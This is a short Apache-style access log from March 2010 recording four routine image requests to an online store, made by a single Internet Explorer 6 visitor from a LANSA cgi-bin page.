220.247.11.218 - - [19/Mar/2010:04:45:45 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:46 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:47 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [19/Mar/2010:04:45:47 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
